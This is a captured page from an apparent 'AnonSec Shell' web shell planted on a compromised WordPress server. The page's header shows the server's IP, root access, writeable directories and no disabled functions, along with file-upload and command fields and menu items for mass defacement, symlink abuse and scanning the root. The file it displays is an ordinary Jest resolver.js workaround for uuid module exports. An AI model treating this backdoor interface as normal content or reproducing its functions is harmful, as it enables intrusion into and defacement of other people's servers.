AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.149.235.108   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/vendor/wpex/godaddy-launch/.dev/tests/jest/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/vendor/wpex/godaddy-launch/.dev/tests/jest/resolver.js
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.

module.exports = ( path, options ) => {
	// Call the defaultResolver, so we leverage its cache, error handling, etc.
	return options.defaultResolver( path, {
		...options,
		// Use packageFilter to process parsed `package.json` before the resolution (see https://www.npmjs.com/package/resolve#resolveid-opts-cb)
		packageFilter: ( pkg ) => {
			// This is a workaround for https://github.com/uuidjs/uuid/pull/616
			//
			// jest-environment-jsdom 28+ tries to use browser exports instead of default exports,
			// but uuid v8 only offers an ESM browser export and not a CommonJS one. Jest does not yet
			// support ESM modules natively, so this causes a Jest error related to trying to parse
			// "export" syntax.
			//
			// This workaround prevents Jest from considering uuid's module-based exports at all;
			// it falls back to uuid's CommonJS+node "main" property.
			//
			// Once we're able to migrate our Jest config to ESM and a browser crypto
			// implementation is available for the browser+ESM version of uuid to use (eg, via
			// https://github.com/jsdom/jsdom/pull/3352 or a similar polyfill), this can go away.
			if (
				pkg.name === 'uuid' ||
				pkg.name === 'react-colorful' ||
				pkg.name === '@eslint/eslintrc' ||
				pkg.name === 'expect'
			) {
				delete pkg.exports;
				delete pkg.module;
			}
			return pkg;
		},
	} );
};

Anon7 - 2022
AnonSec Team